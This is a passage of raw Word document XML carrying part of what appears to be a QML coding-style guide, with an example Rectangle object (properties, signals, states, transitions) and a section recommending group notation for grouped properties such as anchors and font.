        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>photo</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object would look like this: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id</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photo</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// id on the first line makes it easy to find an object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property </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bool</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thumbnail</w:t>
      </w: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false</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// property declarations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property </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alias</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image</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photoImage</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source</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signal </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clicked</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// signal declarations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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</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doSomething</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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)                                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// javascript functions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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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photoImage</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width</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color</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"gray"</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                           </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// object properties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x</w:t>
      </w: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20</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y</w:t>
      </w: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20</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height</w:t>
      </w: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150</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// try to group related properties together</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: {                                                </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// large bindings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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</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photoImage</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w: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200</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)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photoImage</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else</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200</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {                                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// child objects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id</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border</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.centerIn: </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color</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"white"</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</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photoImage</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anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.centerIn: </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states</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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {                                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// states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name</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"selected"</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target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border</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color</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"red"</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transitions</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Transition</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// transitions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from</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to</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"selected"</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ColorAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target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border</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duration</w:t>
      </w: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200</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="grouped-properties"/>
      <w:bookmarkStart w:id="562" w:name="_Toc483000650"/>
      <w:bookmarkStart w:id="563" w:name="_Toc483003667"/>
      <w:bookmarkStart w:id="564" w:name="_Toc483604003"/>
      <w:bookmarkStart w:id="565" w:name="_Toc483605223"/>
      <w:bookmarkEnd w:id="561"/>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Grouped Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="562"/>
      <w:bookmarkEnd w:id="563"/>
      <w:bookmarkEnd w:id="564"/>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If using multiple properties from a group of properties, consider </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>group notation</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instead of</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dot notation</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if it improves readability.</w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, this: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.left: </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left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anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.top: </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top</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anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.right: </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right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anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.leftMargin: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</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text</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"hello"</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font</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.bold: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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font</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
